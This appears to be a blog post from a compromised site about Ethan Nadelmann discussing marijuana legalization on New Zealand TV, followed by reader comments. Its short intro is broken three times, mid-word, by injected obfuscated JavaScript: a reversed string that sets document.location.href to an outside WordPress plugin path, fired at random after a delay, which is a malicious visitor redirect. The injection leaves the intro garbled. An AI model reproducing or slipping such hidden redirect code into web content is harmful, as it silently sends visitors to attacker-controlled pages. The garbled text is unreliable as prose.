Ethan Nadelmann on New Zealand TV Taking about Legalizing Marijuana

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Drug Policy Alliance founder and executive directoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor Ethan Nadelmann appears on New Zealand’s One News toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to talk about the legalization of marijuana and New Zealands ground breaking effort toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to regulate “new drugs.”.

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15 thoughts on “Ethan Nadelmann on New Zealand TV Taking about Legalizing Marijuana”

  1. dick tracey says:

    Great job Ethan keep up the good work

  2. Tittylovwr says:

    My hero!

  3. Rich Mikesell says:

    Legalize it NZ!!!

  4. xsach1 says:

    i fukn love this man and i hope he comes back to my country

  5. Felix Sheldon says:

    Sharp as a tack, put one on Obamas chair

  6. moe lestangus says:

    Very refreshing to hear an academic on this topic as apposed to the usual reporters that know very little about the issue. Awesome work Mr Nadlemann

  7. Rangifulla says:

    I'm a Labour supporter but even I would vote for John Key if he made legalisation an election promise.

  8. Lewis Archer says:

    marijuana is and never was a gateway drug!! prohibition is a gateway, pot is just the drug πŸ™‚

  9. Alexthekid1991 says:

    Can someone please explain to me why people that don't need it for medical reasons push for it?

  10. Jonathan Jacob says:

    β€œOpen your eyes, look within. Are you satisfied with the life you're living?” ― Bob Marley.

    legalize

  11. Erasmus Mak says:

    someone who nows what hes talking about

  12. Weed Star says:

    prime minister ethan nandelman

  13. WillofNewZealand says:

    So at the end of 2015 NZ according to police on 6 oclock news NZ has more meth now than ever in our history.
    Somewhere in the regine of 260 to 300 million dollars worth of meth was found in NZ in 2015 'notice how the media ain't saying shit. Yip Meth dealers won NZ. tho most of that meth was found in just six months and i noticed the reporting on it seemed to just stop. Deaths from marijuana 0 ,,,deaths from tobacco 5 million per year, so law makers favour death and tobacco is legal and marijuana in NZ illegal. I could write on and on but the politicians are whipped by big money, gangs in NZ can expect a billion tax free, thanks law makers, thanks government they love you. Media continue to hide also, all beaten and whipped. but there is money to be made as you must from a violent culture. I suppose if tobacco gets outlawed then the gangs win another billion dollar tax free deal sweet. I suppose the money is going to be in bats, knives, oh and bandanas.
    Eh usually i'd protest that NZ law makers new this was the outcome of the current direction but went this way anyway,,,but i'm thinking more and more shouldn't we aspire to be like our leaders, sell things that kill, tobacco, alcohol increases violence 25% so i've read so they lowered the drinking age knowing that so, if it kills and increases violence then thats ok for NZ.
    As i say i was going to protest like i usually would but aspiring to be like our leaders sell more wepons, sell tobacco, alcohol, and let the gangs run it as they do, its how its ment to be so we should accept it, like it, the law makers new this direction would increase meth sales in NZ hay that shit ain't got much market anywhere else so why should i fight it any longer, let the meth heads win NZ, what am i saying they won it last year 2015 the year meth dealers won NZ.
    Pointing out stats, safest option, American medical use of marijuana for the last 19 years, none of that matters in NZ.
    We are already beaten, i still feel sorry for the man in this clip comming here waisting his time on NZ, he probably doesn't even know about the meth boom since this clip. We lost nz to meth dealers pal, sorry. NZ the example of what a failed drug policy looks like, at least the world now has a dumping ground for meth and bath salts and those new synths nobody knows about or what to look for. Ar oh our homeless doubled that year also according to the papers. So theres NZ's ground breaking drug policy worlds biggest epic fail. Notice how NZ poled 60% to legalize ,,,ha ha ha as if democracy is gonna happen,,,ar good one. At least the flag that nobody wants and could have been sown by a retired old person in a old folks home could have been sown for the price of a tea bag and a pole could have been done on face book for free, but hay to top off 2015 someone pocketed 26 mill see corruption rules and democracy science safety stats drools.
    Yeah i may have been full of hope, like a young person, but i'm waking up to how reality really is.
    But at least we can expect the same old shit, the law cracks down on which ever drug is easy to find usually weed which pushes people into meth like happened as its fast to make and hard to detect and as the crack down happens the price goes up and attracts more poor people in. They do that same trick all the time and it works every time, meth dealers have won for that very reason. eh i'm bord hope and i know my comments are a waist of time.
    Why should i give a shit anymore.

  14. Esoteric Name says:

    why the FUCK is it not legal yet smh

  15. Mitchell Laverick says:

    This was 3 years ago and since then nothing has changed. Isn't it time this joke got sorted out. At least decriminalise it.

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